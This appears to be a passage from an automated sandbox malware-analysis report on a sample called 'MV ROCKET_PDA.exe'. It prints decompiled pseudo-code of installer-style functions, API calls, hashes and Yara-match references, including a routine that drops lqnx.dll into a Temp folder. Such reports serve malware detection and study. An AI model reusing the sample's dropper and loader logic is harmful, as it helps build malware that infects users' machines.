				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                            0x00401d46
                                                                                            0x00401d5f
                                                                                            0x00401d69
                                                                                            0x00401d6e
                                                                                            0x00401d79
                                                                                            0x00401d80
                                                                                            0x00401d92
                                                                                            0x00401d98
                                                                                            0x00401d9d
                                                                                            0x00401da7
                                                                                            0x004024eb
                                                                                            0x00401561
                                                                                            0x00402866
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401D3F
                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                            • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirect
                                                                                            • String ID:
                                                                                            • API String ID: 3272661963-0
                                                                                            • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                            • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                                                            • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                                                            • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}






                                                                                            0x00402bf8
                                                                                            0x00402c12
                                                                                            0x00402c18
                                                                                            0x00402c22
                                                                                            0x00402c28
                                                                                            0x00402c2e
                                                                                            0x00402c3f
                                                                                            0x00402c48
                                                                                            0x00000000
                                                                                            0x00402c4d
                                                                                            0x00402c54
                                                                                            0x00402c1a
                                                                                            0x00402c21
                                                                                            0x00402c21
                                                                                            0x00402bfa
                                                                                            0x00402bfa
                                                                                            0x00402c01
                                                                                            0x00402c04
                                                                                            0x00402c04
                                                                                            0x00402c0a
                                                                                            0x00402c11
                                                                                            0x00402c11

                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                            • GetTickCount.KERNEL32 ref: 00402C22
                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                            • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                                                            • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                                                            • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}




                                                                                            0x00404e0f
                                                                                            0x00404e34
                                                                                            0x00404e54
                                                                                            0x00404e57
                                                                                            0x00404e5a
                                                                                            0x00404e71
                                                                                            0x00404e77
                                                                                            0x00404e7e
                                                                                            0x00404e85
                                                                                            0x00404e8c
                                                                                            0x00404e91
                                                                                            0x00404e97
                                                                                            0x00000000
                                                                                            0x00404ea7
                                                                                            0x00404e41
                                                                                            0x00404e94
                                                                                            0x00404e94
                                                                                            0x00000000
                                                                                            0x00404e94
                                                                                            0x00404e4d
                                                                                            0x00404e4f
                                                                                            0x00000000
                                                                                            0x00404e4f
                                                                                            0x00404e15
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404e1c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • IsWindowVisible.USER32 ref: 00404E39
                                                                                            • CallWindowProcA.USER32 ref: 00404EA7
                                                                                              • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                            • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                                                            • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                            • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                            0x004024f1
                                                                                            0x004024f1
                                                                                            0x004024f4
                                                                                            0x0040250f
                                                                                            0x004024f6
                                                                                            0x004024f8
                                                                                            0x004024fd
                                                                                            0x00402504
                                                                                            0x00402516
                                                                                            0x0040268f
                                                                                            0x0040268f
                                                                                            0x0040251c
                                                                                            0x0040252e
                                                                                            0x004015a6
                                                                                            0x004015a8
                                                                                            0x00000000
                                                                                            0x004015ae
                                                                                            0x004015a8
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll, xrefs: 004024FD, 00402522
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FileWritelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll
                                                                                            • API String ID: 427699356-779148988
                                                                                            • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                            • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                                                                            • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                            • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404F85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 44%
                                                                                            			E00404F85(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x42ec48; // 0x51397c
				_t10 =  *0x42ec4c; // 0x2
				__imp__OleInitialize(0);
				 *0x42ecd8 =  *0x42ecd8 | __eax;
				E00403ECF(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					do {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) == 0) {
							goto L4;
						} else {
							_push(_v0);
							if(E00401389( *_t12) != 0) {
								 *0x42ecac =  *0x42ecac + 1;
							} else {
								goto L4;
							}
						}
						goto L7;
						L4:
						_t12 = _t12 + 0x418;
					} while (_t10 != 0);
				}
				L7:
				E00403ECF(0x404);
				__imp__OleUninitialize();
				_t8 =  *0x42ecac; // 0x0
				return _t8;
			}








                                                                                            0x00404f86
                                                                                            0x00404f8d
                                                                                            0x00404f95
                                                                                            0x00404f9b
                                                                                            0x00404fa3
                                                                                            0x00404faa
                                                                                            0x00404fac
                                                                                            0x00404faf
                                                                                            0x00404faf
                                                                                            0x00404fb4
                                                                                            0x00000000
                                                                                            0x00404fb6
                                                                                            0x00404fb6
                                                                                            0x00404fc3
                                                                                            0x00404fd1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404fc3
                                                                                            0x00000000
                                                                                            0x00404fc5
                                                                                            0x00404fc5
                                                                                            0x00404fcb
                                                                                            0x00404fcf
                                                                                            0x00404fd7
                                                                                            0x00404fdc
                                                                                            0x00404fe1
                                                                                            0x00404fe7
                                                                                            0x00404fee

                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 00404F95
                                                                                              • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 00404FE1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                            • String ID: |9Q
                                                                                            • API String ID: 2896919175-2957157630
                                                                                            • Opcode ID: 30ab11e00dbeb51ca236c749d8926ec7d9dd09e205587ca33223078b0ea66fd0
                                                                                            • Instruction ID: 3412b2758c046384b18635310f82fde34dc1c24163575810483935c249b0902b
                                                                                            • Opcode Fuzzy Hash: 30ab11e00dbeb51ca236c749d8926ec7d9dd09e205587ca33223078b0ea66fd0
                                                                                            • Instruction Fuzzy Hash: 70F0B4B36082019AE7116B96DD01B5A77A59FD0711F05403BFF44B23E0DB795842876D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                            0x00405430
                                                                                            0x0040544c
                                                                                            0x00405454
                                                                                            0x00405459
                                                                                            0x00000000
                                                                                            0x0040545f
                                                                                            0x00405463

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                            • CloseHandle.KERNEL32(?), ref: 00405459
                                                                                            Strings
                                                                                            • Error launching installer, xrefs: 0040543A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID: Error launching installer
                                                                                            • API String ID: 3712363035-66219284
                                                                                            • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                            • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                                                            • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                            • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}







                                                                                            0x00403586
                                                                                            0x0040358e
                                                                                            0x00403595
                                                                                            0x00403598
                                                                                            0x00403598
                                                                                            0x0040359a
                                                                                            0x0040359f
                                                                                            0x004035a6
                                                                                            0x004035ac
                                                                                            0x004035b0
                                                                                            0x004035b1
                                                                                            0x004035b9

                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                                                            • GlobalFree.KERNEL32 ref: 004035A6
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-3916508600
                                                                                            • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                            • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                                                            • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                            • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                            0x00405702
                                                                                            0x0040570c
                                                                                            0x0040570e
                                                                                            0x00405715
                                                                                            0x0040571d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040571d
                                                                                            0x0040571f
                                                                                            0x00405724

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV ROCKET_PDA.exe,C:\Users\user\Desktop\MV ROCKET_PDA.exe,80000000,00000003), ref: 00405707
                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV ROCKET_PDA.exe,C:\Users\user\Desktop\MV ROCKET_PDA.exe,80000000,00000003), ref: 00405715
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 2709904686-1669384263
                                                                                            • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                            • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                                                            • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                            • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                            0x0040581f
                                                                                            0x00405821
                                                                                            0x00405849
                                                                                            0x0040582e
                                                                                            0x00405833
                                                                                            0x0040583e
                                                                                            0x00000000
                                                                                            0x0040585b
                                                                                            0x00405847
                                                                                            0x00405847
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                                                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                            • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                                                            • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                            • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: MV ROCKET_PDA.exe PID: 7068 Parent PID: 7032 MV ROCKET_PDA.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0041869A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: A:A
                                                                                            • API String ID: 2738559852-2859176346
                                                                                            • Opcode ID: 75f3d245560662c8c0e1815447feaa452e17f59b84eabb54b59c08656407bda2
                                                                                            • Instruction ID: 016fa75784eeb6c017ed7088f40a9947706154774f81e3a4d122725ba63b4d27
                                                                                            • Opcode Fuzzy Hash: 75f3d245560662c8c0e1815447feaa452e17f59b84eabb54b59c08656407bda2
                                                                                            • Instruction Fuzzy Hash: 00F0E2B2200208ABDB14DF89DC80EEB77A9BF8C754F118248FE1D97241CA30E8558BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 21%
                                                                                            			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed char _a36, void* _a40) {
				signed char _t15;
				void* _t19;
				intOrPtr _t21;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E004191F0(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t15 = _a36;
				_t21 = _a32;
				asm("les edx, [edx+edx*2]");
				_t19 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _t21, _t15 & 0x00000083); // executed
				return _t19;
			}








                                                                                            0x004186a3
                                                                                            0x004186af
                                                                                            0x004186b7
                                                                                            0x004186bf
                                                                                            0x004186c2
                                                                                            0x004186c6
                                                                                            0x004186e5
                                                                                            0x004186e9

